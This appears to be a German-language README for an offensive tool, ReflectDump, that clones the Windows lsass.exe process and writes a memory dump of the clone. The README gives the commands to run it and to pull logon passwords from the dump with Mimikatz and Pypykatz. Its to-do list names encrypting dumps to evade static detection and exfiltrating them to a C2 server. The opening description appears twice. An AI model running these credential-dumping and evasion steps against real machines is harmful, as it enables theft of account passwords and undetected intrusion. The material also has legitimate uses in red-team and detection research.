
Dieses Tool nutzt die Process-Forking-Technik mithilfe der RtlCreateProcessReflection-API, um den lsass.exe-Prozess zu klonen. Sobald der Klon erstellt wurde, verwendet es MINIDUMP_CALLBACK_INFORMATION-Callbacks, um ein Memory-Dump des geklonten Prozesses zu erzeugen.
Dieses Tool nutzt die Process-Forking-Technik mithilfe der RtlCreateProcessReflection-API, um den lsass.exe-Prozess zu klonen. Sobald der Klon erstellt ist, verwendet es MINIDUMP_CALLBACK_INFORMATION-Callbacks, um einen Speicherabbild des geklonten Prozesses zu erzeugen.
Führen Sie einfach die kompilierte Datei aus.
ReflectDump.exe
Verwenden Sie Mimikatz oder Pypykatz, um die Dump-Datei offline zu analysieren.
sekurlsa::minidump [filename] sekurlsa::logonpasswords
pypykatz lsa minidump [filename]
* Encrypt dump before writing on disk to bypass static detection.
* Exfiltrate on C2 Server
Der Inhalt dieses Repositorys dient nur zu Bildungs- und Informationszwecken.
https://www.deepinstinct.com/blog/dirty-vanity-a-new-approach-to-code-injection-edr-bypass